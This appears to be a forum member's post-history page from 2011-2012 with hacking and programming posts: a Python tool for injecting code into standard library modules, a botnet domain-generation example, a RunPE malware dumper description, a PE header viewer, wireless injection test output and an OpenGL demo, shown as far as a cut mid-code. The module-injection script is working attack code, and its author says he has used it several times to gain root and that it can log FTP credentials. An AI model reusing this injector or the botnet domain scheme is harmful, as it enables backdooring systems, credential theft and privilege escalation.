Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - Zer0Flag

Pages: [1] 2
1
Hardware / Re: alfa usb wifi problems
« on: August 16, 2012, 03:33:37 pm »
This is a known issue with the NHR. Seems there are no drivers supporting this fully right now cause its the latest alfa stick.
 
A better choice would be the NH :)

~Zer0Flag

2
Hardware / Re: alfa usb wifi problems
« on: August 16, 2012, 02:25:15 pm »
I have the same problem with my NHR but if you check if the injections are working it should work. Maybe try compat-wireless drivers ? The last time I tested them they didn´t seem to work(http://linuxwireless.org/download/compat-wireless-2.6/). May also check out this thread: http://www.backtrack-linux.org/forums/showthread.php?t=45323&page=5

Code: [Select]
root@bt:~# aireplay-ng -9 -i mon0 wlan1
14:24:02  Trying broadcast probe requests...
14:24:04  No Answer...
14:24:04  Found 1 AP
14:24:04  Trying directed probe requests...
14:24:04  00:01:E3:**:**:** - channel: 8 - '******'
14:24:05  Ping (min/avg/max): 3.509ms/16.190ms/45.019ms Power: -66.55
14:24:05  29/30:  96%
14:24:05  Injection is working!
14:24:05  Trying card-to-card injection...
14:24:05  Attack -0:           OK
14:24:05  Attack -1 (open):    OK
14:24:05  Attack -1 (psk):     OK
14:24:05  Attack -2/-3/-4/-6:  OK
14:24:05  Attack -5/-7:        OK

~Zer0Flag

3
Scripting Languages / Re: [Python] Python Module Infection
« on: July 06, 2012, 11:40:35 pm »
sure they need to be reloaded to import the infected module. But just think about a backup script in .py which stores the .tar.gz on a ftp... and the scripts needs to be executed with admin rights to access all folders which needs to be saved...

Sure that are a lot of conditions which needs to be true for a successful attack but I already used this several times to get root access on a box and I think its very dangerous.

~Zer0Flag

4
Other / Re: Where to get IDA Pro or other Decompiler?
« on: July 03, 2012, 10:02:28 pm »
If you want only a disassambler / debugger you could take a look at OllyDBG or Immunity Debugger ( a clone of olly but has better Python Scripting support and several improvements ). For a decompiler you should look for each programming language for a own one. But IDA is one of the best tools you can get for malware analysis and you can extend it easily for new formats / file types, with plugins, py support etc ( I just love it).

~Zer0Flag

5
Scripting Languages / Re: [Python] Python Module Infection
« on: June 21, 2012, 12:06:46 am »
I didn´t say that crc checks would be the ultimate protection also there is always a way to bypass the checks. But just as it is its dangerous to use py scripts on your roots... ( And No I don´t have something against py! I love it! )

~Zer0

6
Scripting Languages / Re: [Python] Python Module Infection
« on: June 20, 2012, 10:12:42 pm »
Well but e.g. when you got access to a root and you see that the admin uses a backup python script you could inject into the used functions and got your code executed with root rights. So I think this is a fail from python to not check if the local libs got modified or not. A little crc check when the libs get imported and a warning to the user that he should be careful would be nice and easy to implement...

~Zer0

7
Scripting Languages / [Python] Python Module Infection
« on: June 20, 2012, 08:49:58 pm »
Hello,
 
 I recognized that you can modify default python modules like the "ftplib" and there are no checks if the module got modified and through that you can inject code which gets executed by all scripts which use the modified function. For example this could be used to execute code with admin rights even if your user doesn´t have this rights. Or to log FTP connections ( user , passwd , host , port... ) and a lot more. I didn´t found something about this issue on google and I don´t know if this is a known issue.
 
 I created a small script which helps to inject your code for testing purposes.
Code: [Select]
#!/usr/bin/python
#
# Coder   : Zer0Flag
# Date    : 18.06.2012
# Contact : zer0fl4g@googlemail.com
#
# Usage   : PyRTInfect.py -l <file you want inject into> -f <function you want inject into> -c <file you want to inject>
#           PyRTInfect.py -l <file you want to clean>
#
# Example : PyRTInfect.py -l C:\Python2.7\Lib\ftplib.py -f login -c C:\MyEvilPayload.py
#           PyRTInfect.py -l /usr/lib/python2.6/ftplib.py -f login -c /home/MyEvilPayload.py
#
# Tested  : Windows XP SP3 @ Python 2.7
#           Windows 7 SP1 @ Python 2.7
#           BackTrack 5 @ Python 2.6
#

import sys

def PrintUsage():
    print 'Usage:\n\t%s -l <file> -f <function> -c <file.to.inject>' % sys.argv[0]
    print '\t%s -l <file>\t#Clear all Injections' % sys.argv[0]
       
def InjectIntoRT(sFileToInfect,sFunctionToInfect,sFileToInject):
    if len(sFileToInfect) != 0 and len(sFunctionToInfect) != 0 and len(sFileToInject) != 0:
        sFTI = open(sFileToInfect,'r+')
        sFTIn = open(sFileToInject,'r+')
       
        bGoOn = True
        bWriteData = True
        iLineCounter = 0
        IWCount = 0
        sBackUpTFI = sFTI.readlines()
        sFTI.seek(0)
       
        while bGoOn:
            iLineCounter += 1
            sLine = sFTI.readline()
            if str(sLine).__contains__('def ' + sFunctionToInfect):
                print '[+] Function: \"%s\" found at %d' % (sFunctionToInfect,iLineCounter)
                print '[+] Going to Inject following lines!\n'
                sLinesToInject = sFTIn.readlines()
                for sLTI in sLinesToInject:
                    print sLTI
                   
                sFTI.seek(0)
                while bWriteData:
                    try:
                        sFTI.write(sBackUpTFI[IWCount])
                        if IWCount == iLineCounter:
                            sFTI.write('\t#1:Injected\n')
                            sFTI.writelines(sLinesToInject)
                            sFTI.write('\n\t#2:Injected\n')
                        IWCount += 1
                    except IndexError,e:
                        bWriteData = False
                bGoOn = False
       
        sFTI.close()
        sFTIn.close()
    else:
        return 0
    return 1

def ClearRTFile(sFileName):
    fRTFile = open(sFileName,'r+')
    fBackUp = fRTFile.readlines()
    fRTFile.seek(0)
    bWriteOk = True
    iCounter = 0
   
    for sLine in fBackUp:
        if str(sLine).__contains__('#1:Injected'):
            bWriteOk = False
            print '[+] Injected Line Found at %d' % iCounter
        elif str(sLine).__contains__('#2:Injected'):
            bWriteOk = True
            continue
           
        if bWriteOk:
            fRTFile.write(sLine)
        iCounter += 1
    return 1

if __name__ == "__main__":
    if len(sys.argv) < 3:
        PrintUsage()
    elif len(sys.argv) == 3:
        for i in range(0,len(sys.argv)):
            if sys.argv[i] == '-l':
                ClearRTFile(sys.argv[i + 1])               
    elif len(sys.argv) == 7:
        for i in range(0,len(sys.argv)):
            if sys.argv[i] == '-l':
                sFileToInfect = sys.argv[i + 1]
            elif sys.argv[i] == '-f':
                sFunctionToInfect = sys.argv[i + 1]
            elif sys.argv[i] == '-c':
                sFileToInject = sys.argv[i + 1]
               
        if InjectIntoRT(sFileToInfect,sFunctionToInfect,sFileToInject) == 0:
            PrintUsage()


~Zer0

8
Hacking and Security / Re: FTP scan -stats-
« on: January 21, 2012, 11:45:52 am »
I guess you used some box to scan that ? And how long did it take ?

~Zer0

9
C - C++ / Re: [C++] PEPrinter
« on: October 13, 2011, 06:04:57 pm »
Yeah the support is fine under Windows for that :).

Ok sry. I´m used to code in VS ( C++ compiler but able to compile c too ) and sometimes mix up elements of both languages.

10
C - C++ / [C++] PEPrinter
« on: October 12, 2011, 07:16:19 am »
just another PEViewer: shows PEHeader , Imports , Exports , TLS

Code: [Select]
/* (C) Zer0Flag@drunken-nanomites.org */
#include <Windows.h>
#include <stdio.h>
DWORD dwCalculateTableOffset(int iTableEntryNr,PIMAGE_NT_HEADERS pINH,PIMAGE_DOS_HEADER pIDH,BYTE* pBuffer)
{
DWORD tableVA = pINH->OptionalHeader.DataDirectory[iTableEntryNr].VirtualAddress;
PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)(pBuffer + pIDH->e_lfanew + sizeof(IMAGE_NT_HEADERS32));
for (WORD i = 0; i < pINH->FileHeader. NumberOfSections; i++)
{
  DWORD sectionVA = pSectionHeader->VirtualAddress;
  DWORD sectionSize = pSectionHeader->Misc. VirtualSize;
  if ((sectionVA <= tableVA) && (tableVA < (sectionVA+sectionSize)))
  {
   return (DWORD)(pBuffer + pSectionHeader->PointerToRawData + (tableVA-sectionVA));
   break;
  }
  pSectionHeader++;
}
return 0;
}

int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
{
//Init our console for printf
if(!AllocConsole()) return false;
freopen("CONOUT$", "wt", stdout);
SetConsoleTitle("PEView");
SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_GREEN | FOREGROUND_BLUE | FOREGROUND_RED);

if(lpCmdLine == "" || strlen(lpCmdLine) < 1) return false;
BYTE* pFileBuffer;
HANDLE hFile = CreateFile(lpCmdLine,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,NULL,NULL);
DWORD dwBytesRead;
if(hFile == INVALID_HANDLE_VALUE)
{
  return false;
}
int iFileSize = GetFileSize(hFile,0);
pFileBuffer = new BYTE[iFileSize];
if(iFileSize > 0 && !(ReadFile(hFile,pFileBuffer,iFileSize,&dwBytesRead,NULL)))
{
  delete [] pFileBuffer;
  return false;
}
PIMAGE_DOS_HEADER pIDH = 0;
PIMAGE_NT_HEADERS pINH = 0;
PIMAGE_SECTION_HEADER pISH = 0;
PIMAGE_EXPORT_DIRECTORY pIED = 0;
pIDH = (PIMAGE_DOS_HEADER)pFileBuffer;
if(pIDH->e_magic != IMAGE_DOS_SIGNATURE)
{
  delete [] pFileBuffer;
  return false;
}
pINH = (PIMAGE_NT_HEADERS)(pFileBuffer + pIDH->e_lfanew);
if(pINH->Signature != IMAGE_NT_SIGNATURE)
{
  delete [] pFileBuffer;
  return false;
}
//IMAGE_DOS_HEADER
printf("\r\nIMAGE_DOS_HEADER:\r\n\te_magic:\t\t\t0x%08X\r\n\te_cblp:\t\t\t\t0x%08X\r\n\te_cp:\t\t\t\t0x%08X\r\n\te_crlc:\t\t\t\t0x%08X\r\n\t",
  pIDH->e_magic,
  pIDH->e_cblp,
  pIDH->e_cp,
  pIDH->e_crlc);
printf("e_cparhdr:\t\t\t0x%08X\r\n\te_minalloc:\t\t\t0x%08X\r\n\te_maxalloc:\t\t\t0x%08X\r\n\te_ss:\t\t\t\t0x%08X\r\n\t",
  pIDH->e_cparhdr,
  pIDH->e_minalloc,
  pIDH->e_maxalloc,
  pIDH->e_ss);
printf("e_sp:\t\t\t\t0x%08X\r\n\te_csum:\t\t\t\t0x%08X\r\n\te_ip:\t\t\t\t0x%08X\r\n\te_cs:\t\t\t\t0x%08X\r\n\t",
  pIDH->e_sp,
  pIDH->e_csum,
  pIDH->e_ip,
  pIDH->e_cs);
printf("e_lfarlc:\t\t\t0x%08X\r\n\te_ovno:\t\t\t\t0x%08X\r\n\te_res:\t\t\t\t0x%08X\r\n\te_oemid:\t\t\t0x%08X\r\n\t",
  pIDH->e_lfarlc,
  pIDH->e_ovno,
  pIDH->e_res,
  pIDH->e_oemid);
printf("e_oeminfo:\t\t\t0x%08X\r\n\te_res2:\t\t\t\t0x%08X\r\n\te_lfanew:\t\t\t0x%08X\r\n",
  pIDH->e_oeminfo,
  pIDH->e_res2,
  pIDH->e_lfanew);

//IMAGE_FILE_HEADER
printf("\r\nIMAGE_FILE_HEADER:\r\n\tMachine:\t\t\t0x%08X\r\n\tNumberOfSections:\t\t0x%08X\r\n\tTimeDateStamp:\t\t\t0x%08X\r\n\tPointerToSymbolTable:\t\t0x%08X\r\n\t",
  pINH->FileHeader.Machine,
  pINH->FileHeader.NumberOfSections,
  pINH->FileHeader.TimeDateStamp,
  pINH->FileHeader.PointerToSymbolTable);
printf("NumberOfSymbols:\t\t0x%08X\r\n\tSizeOfOptionalHeader:\t\t0x%08X\r\n\tCharacteristics:\t\t0x%08X\r\n",
  pINH->FileHeader.NumberOfSymbols,
  pINH->FileHeader.SizeOfOptionalHeader,
  pINH->FileHeader.Characteristics);
//IMAGE_OPTIONAL_HEADER
printf("\r\nIMAGE_OPTIONAL_HEADER:\r\n\tMagic:\t\t\t\t0x%08X\r\n\tMajorLinkerVersion:\t\t0x%08X\r\n\tMinorLinkerVersion:\t\t0x%08X\r\n\tSizeOfCode:\t\t\t0x%08X\r\n\t",
  pINH->OptionalHeader.Magic,
  pINH->OptionalHeader.MajorLinkerVersion,
  pINH->OptionalHeader.MinorLinkerVersion,
  pINH->OptionalHeader.SizeOfCode);
printf("SizeOfInitializedData:\t\t0x%08X\r\n\tSizeOfUninitializedData:\t0x%08X\r\n\tAddressOfEntryPoint:\t\t0x%08X\r\n\tBaseOfCode:\t\t\t0x%08X\r\n\tBaseOfData:\t\t\t0x%08X\r\n",
  pINH->OptionalHeader.SizeOfInitializedData,
  pINH->OptionalHeader.SizeOfUninitializedData,
  pINH->OptionalHeader.AddressOfEntryPoint,
  pINH->OptionalHeader.BaseOfCode,
  pINH->OptionalHeader.BaseOfData);
printf("\tImageBase:\t\t\t0x%08X\r\n\tSectionAlignment:\t\t0x%08X\r\n\tFileAlignment:\t\t\t0x%08X\r\n\tMajorOperatingSystemVersion:\t0x%08X\r\n\t",
  pINH->OptionalHeader.ImageBase,
  pINH->OptionalHeader.SectionAlignment,
  pINH->OptionalHeader.FileAlignment,
  pINH->OptionalHeader.MajorOperatingSystemVersion);
printf("MinorOperatingSystemVersion:\t0x%08X\r\n\tMajorImageVersion:\t\t0x%08X\r\n\tMinorImageVersion:\t\t0x%08X\r\n\tMajorSubsystemVersion:\t\t0x%08X\r\n\tMinorSubsystemVersion:\t\t0x%08X\r\n",
  pINH->OptionalHeader.MinorOperatingSystemVersion,
  pINH->OptionalHeader.MajorImageVersion,
  pINH->OptionalHeader.MinorImageVersion,
  pINH->OptionalHeader.MajorSubsystemVersion,
  pINH->OptionalHeader.MinorSubsystemVersion);
printf("\tWin32VersionValue:\t\t0x%08X\r\n\tSizeOfImage:\t\t\t0x%08X\r\n\tSizeOfHeaders:\t\t\t0x%08X\r\n\tCheckSum:\t\t\t0x%08X\r\n\t",
  pINH->OptionalHeader.Win32VersionValue,
  pINH->OptionalHeader.SizeOfImage,
  pINH->OptionalHeader.SizeOfHeaders,
  pINH->OptionalHeader.CheckSum);
printf("Subsystem:\t\t\t0x%08X\r\n\tDllCharacteristics:\t\t0x%08X\r\n\tSizeOfStackReserve:\t\t0x%08X\r\n\tSizeOfStackCommit:\t\t0x%08X\r\n\t",
  pINH->OptionalHeader.Subsystem,
  pINH->OptionalHeader.DllCharacteristics,
  pINH->OptionalHeader.SizeOfStackReserve,
  pINH->OptionalHeader.SizeOfStackCommit);
printf("SizeOfHeapReserve:\t\t0x%08X\r\n\tSizeOfHeapCommit:\t\t0x%08X\r\n\tLoaderFlags:\t\t\t0x%08X\r\n\tNumberOfRvaAndSizes:\t\t0x%08X\r\n\t",
  pINH->OptionalHeader.SizeOfHeapReserve,
  pINH->OptionalHeader.SizeOfHeapCommit,
  pINH->OptionalHeader.LoaderFlags,
  pINH->OptionalHeader.NumberOfRvaAndSizes);
//IMAGE_DATA_DIRS
printf("\r\nIMAGE_DATA_DIRECTORY:\r\n");
for(int i = 0; i < pINH->OptionalHeader.NumberOfRvaAndSizes;i++)
{
  printf("\t Nr.%02d: VA: 0x%08X Size: 0x%08X\r\n",
   i,
   pINH->OptionalHeader.DataDirectory[i].VirtualAddress,
   pINH->OptionalHeader.DataDirectory[i].Size);
}
//IMAGE_SECTION_HEADER
printf("\r\nIMAGE_SECTION_HEADER:\r\n");
PIMAGE_SECTION_HEADER pSH = (PIMAGE_SECTION_HEADER)(pFileBuffer + pIDH->e_lfanew + sizeof(IMAGE_NT_HEADERS32));
for (int i = 0; i < pINH->FileHeader.NumberOfSections;i++)
{
  printf("\tName:\t\t\t%s\r\n\tVirtualSize:\t\t0x%08X\r\n\tVirtualAdress:\t\t0x%08X\r\n\tSizeOfRawData:\t\t0x%08X\r\n\tPointerToRawData:\t0x%08X\r\n\tCharacteristics:\t0x%08X\r\n",
   pSH->Name,
   pSH->Misc.VirtualSize,
   pSH->VirtualAddress,
   pSH->SizeOfRawData,
   pSH->PointerToRawData,
   pSH->Characteristics);
  pSH++;
}
DWORD dwVAOfImportSection = pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;     
DWORD dwImportSectionOffset = dwCalculateTableOffset(IMAGE_DIRECTORY_ENTRY_IMPORT,pINH,pIDH,pFileBuffer);
if(dwImportSectionOffset != 0)
{
  PIMAGE_IMPORT_DESCRIPTOR pImportHeader = (PIMAGE_IMPORT_DESCRIPTOR)dwImportSectionOffset;
  //IMAGE_IMPORTS_DESCRIPTORS
  printf("\r\nFILE_IMPORTS:\r\n");
  do
  {
   printf("\r\n\tName:\t\t\t%s\r\n\tCharacteristics:\t0x%08X\r\n\tFirstThunk(IAT):\t0x%08X\r\n\tOriginalFirstThunk(INT):0x%08X\r\n\tForwarderChain:\t\t0x%08X\r\n\tTimeDateStamp:\t\t0x%08X\r\n",
    (char*)((pImportHeader->Name)-dwVAOfImportSection) + dwImportSectionOffset,
    pImportHeader->Characteristics,
    pImportHeader->FirstThunk,
    pImportHeader->OriginalFirstThunk,
    pImportHeader->ForwarderChain,
    pImportHeader->TimeDateStamp);
   //DWORD rvaINT = pImportHeader->OriginalFirstThunk;
   DWORD rvaIAT = pImportHeader->FirstThunk;
   PIMAGE_THUNK_DATA32 pIAT = (PIMAGE_THUNK_DATA32)((rvaIAT - dwVAOfImportSection) + dwImportSectionOffset);
   if (pIAT->u1. Ordinal) //maybe no imports from dll
   {
    printf("\r\n\tIMPORTS:\r\n");
    do
    {
         if (IMAGE_SNAP_BY_ORDINAL32(pIAT->u1.Ordinal))
         {
          //by ordinal
          printf("\tOrdinal:\t\t\t0x%08X\r\n",
           IMAGE_ORDINAL32(pIAT->u1.Ordinal));
         } else {
          //by name
          PIMAGE_IMPORT_BY_NAME pImportName = (PIMAGE_IMPORT_BY_NAME)(((pIAT->u1.AddressOfData)- dwVAOfImportSection) + dwImportSectionOffset);
          printf("\t\tName:\t\t%s\r\n\t\tHint:\t\t0x%08X\r\n",
           pImportName->Name,
           pImportName->Hint);
         }
         pIAT++;
    } while (pIAT->u1. AddressOfData != 0);
   }
   pImportHeader++;
  } while (pImportHeader->Name);
}
DWORD exportTableVA = pINH->OptionalHeader. DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]. VirtualAddress;
DWORD exportTableOffset = dwCalculateTableOffset(IMAGE_DIRECTORY_ENTRY_EXPORT,pINH,pIDH,pFileBuffer);
if(exportTableOffset != 0)
{
  //IMAGE_EXPORT_DESCRIPTORS
  printf("\r\n\tFILE_EXPORTS:\r\n");
  PIMAGE_EXPORT_DIRECTORY pExportTable = (PIMAGE_EXPORT_DIRECTORY)(exportTableOffset);

  printf("\tName:\t\t\t%s\r\n\tBase:\t\t\t0x%08X\r\n\tNumberOfFunctions:\t0x%08X\r\n\tNumberOfNames:\t0x%08X\r\n\tAddressOfFunctions:\t\t0x%08X\r\n\tAddressOfNameOrdinals:\t0x%08X\r\n",
   (char *)((pExportTable->Name)-exportTableVA) + exportTableOffset,
   pExportTable->Base,
   pExportTable->NumberOfFunctions,
   pExportTable->NumberOfNames,
   pExportTable->AddressOfFunctions,
   pExportTable->AddressOfNameOrdinals);
  DWORD* addressOfFunctionsArray = (DWORD*)(((pExportTable->AddressOfFunctions)-exportTableVA) + exportTableOffset);
  DWORD* addressOfNamesArray = (DWORD*)(((pExportTable->AddressOfNames)-exportTableVA) + exportTableOffset);
  WORD* addressOfNameOrdinalsArray = (WORD*)(((pExportTable->AddressOfNameOrdinals)-exportTableVA) + exportTableOffset);
  for (DWORD i = 0; i < pExportTable->NumberOfNames; i++)
  {
   printf("\tName:\t\t\t%s\r\n\tOrdinal:\t\t\t0x%08X\r\n\tName Ordinal:\t0x%08X\r\n\tAdress(RVA):\t0x%08X\r\n",
    (char*)(((addressOfNamesArray[i])-exportTableVA) + exportTableOffset),
    (addressOfNameOrdinalsArray[i] + pExportTable->Base),
    addressOfNameOrdinalsArray[i],
    addressOfFunctionsArray[addressOfNameOrdinalsArray[i]]);
  }
}
DWORD TLSTableVA = pINH->OptionalHeader. DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS]. VirtualAddress;
DWORD TLSTableOffset = dwCalculateTableOffset(IMAGE_DIRECTORY_ENTRY_TLS,pINH,pIDH,pFileBuffer);
if(TLSTableOffset != 0)
{
  //IMAGE_TLS_DIRECTORY
  printf("\r\nTLS-TABLE:\r\n");
  PIMAGE_TLS_DIRECTORY32 pTLS = (PIMAGE_TLS_DIRECTORY32)TLSTableOffset;
  printf("\tStartAddressOfRawData:t\t\t%s\r\n\tEndAddressOfRawData:\t0x%08X\r\n\tSizeOfZeroFill:\t0x%08X\r\n\tCharacteristics:\t0x%08X\r\n\tAddressOfIndex:\t0x%08X\r\n\tAddressOfCallBacks:\t0x%08X\r\n",
   pTLS->StartAddressOfRawData,
   pTLS->EndAddressOfRawData,
   pTLS->SizeOfZeroFill,
   pTLS->Characteristics,
   pTLS->AddressOfIndex,
   pTLS->AddressOfCallBacks);
}
delete [] pFileBuffer;
CloseHandle(hFile);
system("pause");
return 0;
}


~Zer0Flag

11
C - C++ / Re: [C++] DomainFlux
« on: September 07, 2011, 09:13:17 pm »
Yeap that was for the case somebody just wants to copy it and do shit. Its thought for peoples to understand a bit more about domainfluxx ( and worked great for some users as we see :) ).

~0

12
C - C++ / Re: [C++] DomainFlux
« on: September 07, 2011, 07:28:37 pm »
Well there are millions of ways how you can design such a algorithm. This one is one of the easiest and well he is easy to reverse. For example could you implement a grab of the top day news and generate something with them. So this is only a example how you could do it. I made this with a short explanation what DomainFlux is since one user wanted to sell something like that for 75$ O_o

~Zer0 

13
C - C++ / [C++] DomainFlux
« on: September 07, 2011, 06:11:53 pm »
I saw someone selling something like that in a forum and I thought that can***180;t be true.

DomainFlux is a way to secure a bot net , web server , HTTP rat or any other service witch could use a domain. It just generates a unique domain for each day , month , year or even hours depending on the algorithm witch is used. As an example this generated domain can be used in a bot net. The bot will connect to this domain every time he is executed and so the Master has the possibility to get his bot back if the main address ( witch isn***180;t even needed ) gets locked. Of course this is only a very simple example and easy to be reversed ( in fact all are it just takes more time if they are more complex). But I think it is easy to understand how it works ( and not worth 75$ by this guy).

Code: [Select]
// Zer0Flag @ drunken-nanomites.org
#include <Windows.h>
#include <string>
#include <time.h>

using namespace std;

string DomainFlux(string sEnd)
{
    char tmpbuf[128];
    _strdate_s(tmpbuf);
    string sDomain = (string)tmpbuf;

    for(int i = 0; i < sDomain.length(); i++)
    {
        sDomain[i] ^= 13;
        sDomain[i] += 37;
        sDomain[i] >> 42;
    }
    return sDomain + sEnd;
}
int main(int argc,char** argv)
{
    MessageBoxA(NULL,DomainFlux(".com").c_str(),"New Domain each day....",MB_OK);
    return 0;
}
~Zer0Flag

14
C - C++ / [C++] RunPEDumper
« on: September 03, 2011, 02:46:24 pm »
RunPE is a method used mostly in malware to load a binary file from resources and execute it in the memory. This is used to bypass heuristics and make it harder to analyse the file. The most RunPEs in the wild work the same way.

- Create a new Process
- Unmap loaded file form memory to create space for the new one
- Write new file into memory
- GetThreadConext
- Set new entrypoint
- SetThreadContext
- ResumeThread


The easiest way to dump this is to hook the "WriteProcessMemory" API and rederict the buffer to a new file. I used a ExceptionHooklib from OpCodeZ to do this job. Improvments could be hooking "ResumeThread" to prevent the malware thread from beeing executed. Or hook Native APIs wich could be used instead of the "normal" one.

How to use this: Choose your Injector ( in my case the one wich I included from -Alex- ) and select "Load+Inject". Than choose your Target and select the "AntiMalwareHook.dll". The dumped file appears in the same dir as the Targetfile and is called "dump.exe"

Included in Download:
-Source
-Kompiled DLL
-DLL Injector by -Alex-

OriginalSite: Homepage


~Zer0Flag

15
C - C++ / [C]OpenGLDemo.1
« on: September 02, 2011, 11:57:16 pm »
Hey ,

I played a bit with OpenGL and here is the result. First time that I coded with OpenGL so don***180;t freak out if its worse :).
http://www.youtube.com/watch?v=MmvviVVdkzE
Code: [Select]
//Zer0Flag @ drunken-nanomites.org

#include <Windows.h>
#include <gl/GL.h>
#include <gl/GLU.h>
#include <GL/glut.h>
#include <iostream>
#include <time.h>

using namespace std;

float fRotation[20] = { 0.0f };
float fKoordSize = 60.0f;
float fJump = 0.0f;

time_t ExecutionTime = NULL;

void changeSize(int iWidth, int iHeight) {
if (iHeight <= 0)
{
iHeight = 1;
}

float ratio =  iWidth / iHeight;

glViewport(0, 0, iWidth, iHeight);
glMatrixMode(GL_PROJECTION);
glLoadIdentity();
gluPerspective(45.0f, ratio, 0.1f, 100.0f);
glMatrixMode(GL_MODELVIEW);
glLoadIdentity();
}

void renderScene(void) {
Sleep(50);

glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT);

time_t CurrentTime = time(NULL);
long ullCurrentTicks = CurrentTime - ExecutionTime;

if (ullCurrentTicks <= 11)
{
switch (ullCurrentTicks)
{
case 1:
for ( int Ix = 0 ; Ix <= 4; Ix += 4)
{
for ( int Iy = 0; Iy <= 4; Iy += 4)
{
glLoadIdentity();
glEnable(GL_DEPTH_TEST);
gluLookAt(0.0f, 0.0f,fKoordSize,0.0f,0.0f,0.0f,0.0f,1.0f,0.0f);
glTranslatef(((fKoordSize/2) - 8)* (-1) + Ix,((fKoordSize/2) - 8)* (-1) + Iy,0);
glutWireCube(2.0);
}
}
break;
case 2:
for ( int Ix = 0 ; Ix <= 8; Ix += 4)
{
for ( int Iy = 0; Iy <= 8; Iy += 4)
{
glLoadIdentity();
glEnable(GL_DEPTH_TEST);
gluLookAt(0.0f, 0.0f,fKoordSize,0.0f,0.0f,0.0f,0.0f,1.0f,0.0f);
glTranslatef(((fKoordSize/2) - 8)* (-1) + Ix,((fKoordSize/2) - 8)* (-1) + Iy,0);
glutWireCube(2.0);
}
}
break;
case 3:
for ( int Ix = 0 ; Ix <= 12; Ix += 4)
{
for ( int Iy = 0; Iy <= 12; Iy += 4)
{
glLoadIdentity();
glEnable(GL_DEPTH_TEST);
gluLookAt(0.0f, 0.0f,fKoordSize,0.0f,0.0f,0.0f,0.0f,1.0f,0.0f);
glTranslatef(((fKoordSize/2) - 8)* (-1) + Ix,((fKoordSize/2) - 8)* (-1) + Iy,0);
glutWireCube(2.0);
}
}
break;
case 4:
for ( int Ix = 0 ; Ix <= 16; Ix += 4)
{
for ( int Iy = 0; Iy <= 16; Iy += 4)
{
glLoadIdentity();
glEnable(GL_DEPTH_TEST);
gluLookAt(0.0f, 0.0f,fKoordSize,0.0f,0.0f,0.0f,0.0f,1.0f,0.0f);
glTranslatef(((fKoordSize/2) - 8)* (-1) + Ix,((fKoordSize/2) - 8)* (-1) + Iy,0);
glutWireCube(2.0);
}
}
break;
case 5:
for ( int Ix = 0 ; Ix <= 20; Ix += 4)
{
for ( int Iy = 0; Iy <= 20; Iy += 4)
{
glLoadIdentity();
glEnable(GL_DEPTH_TEST);
gluLookAt(0.0f, 0.0f,fKoordSize,0.0f,0.0f,0.0f,0.0f,1.0f,0.0f);
glTranslatef(((fKoordSize/2) - 8)* (-1) + Ix,((fKoordSize/2) - 8)* (-1) + Iy,0);
glutWireCube(2.0);
}
}
break;
case 6:
for ( int Ix = 0 ; Ix <= 24; Ix += 4)
{
for ( int Iy = 0; Iy <= 24; Iy += 4)
{
glLoadIdentity();
glEnable(GL_DEPTH_TEST);
gluLookAt(0.0f, 0.0f,fKoordSize,0.0f,0.0f,0.0f,0.0f,1.0f,0.0f);
glTranslatef(((fKoordSize/2) - 8)* (-1) + Ix,((fKoordSize/2) - 8)* (-1) + Iy,0);
glutWireCube(2.0);
}
}
break;
case 7:
for ( int Ix = 0 ; Ix <= 28; Ix += 4)
{
for ( int Iy = 0; Iy <= 28; Iy += 4)
{
glLoadIdentity();
glEnable(GL_DEPTH_TEST);
gluLookAt(0.0f, 0.0f,fKoordSize,0.0f,0.0f,0.0f,0.0f,1.0f,0.0f);
glTranslatef(((fKoordSize/2) - 8)* (-1) + Ix,((fKoordSize/2) - 8)* (-1) + Iy,0);
glutWireCube(2.0);
}
}
break;
case 8:
for ( int Ix = 0 ; Ix <= 32; Ix += 4)
{
for ( int Iy = 0; Iy <= 32; Iy += 4)
{
glLoadIdentity();
glEnable(GL_DEPTH_TEST);
gluLookAt(0.0f, 0.0f,fKoordSize,0.0f,0.0f,0.0f,0.0f,1.0f,0.0f);
glTranslatef(((fKoordSize/2) - 8)* (-1) + Ix,((fKoordSize/2) - 8)* (-1) + Iy,0);
glutWireCube(2.0);
}
}
break;
case 9:
for ( int Ix = 0 ; Ix <= 36; Ix += 4)
{
for ( int Iy = 0; Iy <= 36; Iy += 4)
{
glLoadIdentity();
glEnable(GL_DEPTH_TEST);
gluLookAt(0.0f, 0.0f,fKoordSize,0.0f,0.0f,0.0f,0.0f,1.0f,0.0f);
glTranslatef(((fKoordSize/2) - 8)* (-1) + Ix,((fKoordSize/2) - 8)* (-1) + Iy,0);
glutWireCube(2.0);
}
}
break;
case 10:
for ( int Ix = 0 ; Ix <= 40; Ix += 4)
{
for ( int Iy = 0; Iy <= 40; Iy += 4)
{
glLoadIdentity();
glEnable(GL_DEPTH_TEST);
gluLookAt(0.0f, 0.0f,fKoordSize,0.0f,0.0f,0.0f,0.0f,1.0f,0.0f);
glTranslatef(((fKoordSize/2) - 8)* (-1) + Ix,((fKoordSize/2) - 8)* (-1) + Iy,0);
glutWireCube(2.0);
}
}
break;
case 11:
for ( int Ix = 0 ; Ix <= 44; Ix += 4)
{
for ( int Iy = 0; Iy <= 44; Iy += 4)
{
glLoadIdentity();
glEnable(GL_DEPTH_TEST);
gluLookAt(0.0f, 0.0f,fKoordSize,0.0f,0.0f,0.0f,0.0f,1.0f,0.0f);
glTranslatef(((fKoordSize/2) - 8)* (-1) + Ix,((fKoordSize/2) - 8)* (-1) + Iy,0);
glutWireCube(2.0);
}
}
break;
}
}
if (ullCurrentTicks > 11 && ullCurrentTicks <= 18)
{
int i = 0;

for ( int Ix = 0 ; Ix <= 60 ; Ix += 4)
{
for(int Iy = 0 ; Iy <= 60 ; Iy += 4)
{
fJump = (((rand() % 8) + 1 ));
glLoadIdentity();
glEnable(GL_DEPTH_TEST);
gluLookAt(0.0f, 0.0f,fKoordSize,0.0f,0.0f,0.0f,0.0f,1.0f,0.0f);
glTranslatef((fKoordSize/2 * (-1)) + Ix,(fKoordSize/2 * (-1)) + Iy,fJump);
